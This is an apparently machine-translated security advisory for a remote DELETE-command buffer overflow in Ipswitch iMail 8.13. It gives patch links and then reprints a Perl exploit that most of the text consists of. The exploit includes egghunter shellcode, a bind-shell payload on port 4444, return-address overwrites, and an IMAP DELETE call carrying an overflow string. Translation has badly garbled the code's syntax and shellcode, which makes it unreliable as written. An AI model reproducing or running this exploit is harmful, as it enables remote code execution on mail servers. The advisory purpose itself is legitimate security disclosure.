One. Email Technology Information Network Note: This vulnerability is found in Imail Server 8.13. According to the news in the Imail Server 8.14 and higher, please download the latest version of the patch in time, this site has been downloaded earlier, the address is as follows:
A) iMail 8.14 Download address: http://www.5dmail.net/down/list.asp? Id = 901
B) iMail 8.14 patch
http://www.5dmail.net/down/list.asp?id=902
two. The following is reproduced in the original text:
Description of IpsWitch IMAIL program
IpsWitch Imail 8.13 Remote DELETE Command Buffer Overflow Vulnerability
IpsWitch Imail Server is a powerful mail solution. IpsWitch Imail Server is incorrect when processing the delete command, and remote attackers can use this vulnerability to buffer overflow attacks on the system. IpsWitch Imail lacks the correct boundary buffer check when dealing with the delete command, verifying that the delete command for the user's submitting parameters can perform any instructions on the system. <* Source: Jerome (Jerome@athias.fr) link: http://marc.theaimsgroup.com/? L = bugtraq & m = 110037283803560 & w = 2 *> Affected system: Ipswitch iMail 8.13 attack
The following procedures (Methods) may have an aggressive, only for security research and teaching. Users are at your own risk! Jerome (Jerome@athias.fr) provides the following test method: #! / Usr / bin / perl -w ############################# ########### ipswitch-imaiL-8.13-delete ## discovered by: muts # coded by: zatlander # www.whitehathat.co.il ########## ################################################################################## -> x7e ## Credits: # - http://www.metasploit.org - hd moore for the metasploit shellcode # - http://www.edup.tudelft.nl/~bjwever/Menu.html - Skylined for the alpha Ascii / shellcode generator # - http://www.hick.org - for the syscall egghunt code in the / paper "understanding windows shellcode" ################################################################################################################################################################################################################################################ ##############@@#### u :: socket; use getopt :: std; user mail :: imapclient; print "Exploit for the ipswitch imail delete buff overflow / n"; print "c0d3d By Zatlander / N "; Print" Discovered By MUTS / N "; Print" www.whitehat.co.il/n";print "for hacking purposes online" "W00TW00T" W00TW00T "W00TW00T" W00TW00T "W00TW00T" W00TW00T "W00TW00T" W00TW00T "; STA RT from ESP # from 0 -> $ egghunter = / "Tyiiiiiiiiiiiiiiii7qzjaxp0a
0Akaaq2ab2bb0bbbabxp8abujivsybuco0okbwdp00pth0uxqrnkhhhhhh
2A
3PL / mvtvqzm6nulfepabtiaxbycrb09gjt5xktysjetsezfmso2exyokra "; $ egghunter = /" TYIIIIIIIIIIIIIII7QZJAXP
0A
0AkAAQ2AB2BB0BBABXP8ABuJINkN44skpmkt7fPTpptx0UXpBLKkx1Q3PL / MtT4QxMVN5lc5sQSDxqyrjSW2VYUJRUXkp9SjVdT5KVosKrWxioKRA "; # Real shellcode: bind shell on port 4444 (./alpha edx
6921526A
-> Pointer to "Call [EDX 8]" Ends Up in Return Address ############################################################################################################################################################################################################################################################################# ########################################################################################################################################################################################################################## Variable here. # Find an ascii safe address pointing to a call [edx 8] for Your OS ###################################################################################################################################################################################################################################################################### ################################### = "JR ! i "; # aaa aligns ESP with The Egghunter Shellcode (POPAD, POP, POP) $ AsciieH =" AAA ". $ EGGHUNTER; $ Asciisc =" W00TW00T ". $ shellcode; $ email =" from: / "the guy hacking You / " / r / n". "To: /" Poor You / " / r / n". "Subject: $ asciisc / r / n" Date: WED, 3 NOV 2004 14:45:11 0100 / r / n "." Message-ID: <000101C
4C
1ACDCNDJ6D69B90 $ 5E
01A
8C
0 / @ snorlax> / r / n "." "Content-Type: text / plain; / r / n / tcharset = /" US-ASCII / "/ r / n". "Content-Transfer-Encoding: 7bit / R / N "." / r / n ". $ Asciisc; $ payload =" a "x 236. $ jmp21 x 3. $ Calledx8." s "x 29. $ asciieh." / r / n "; print" login In to $ Host AS $ USR / $ PWD / N "; MY $ IMAP = mail :: iMapClient-> New (server => $ host, user => $ usr, password => $ pwd) or / die" Cannot Connect : $ @ "; Print" Count: "$ IMAP-> Message_count (" Inbox ")." / n "); Print" Sending Egg / N "; $ IMAP-> SELECT (" Inbox ") or Die" Could Not select: $ @ / n "; my $ uid = $ imap-> append (" Inbox ", $ email) or die" Can not append: $ @ "; $ msg = $ imap-> message_string ($ uid) or die" Cannot get Message: $ @ "; # $ msg = $ @> body_string ($ uid) OR DIE" Cannot Get Message: $ @ "; #print" Retrieving $ UID Back: $ msg / n "; print" overflowing delete / N "; $ IMAP-> DELETE ($ payload) or Die" Cannot Delete: $ @ n "; Print (" Finished ... / N "); vendor patch: ipswitch -------- current manufacturer No patch or upgrade procedure yet, we recommend users who use this software to pay attention to the vendor's homepage for the latest version: http://www.ipswitch.com/
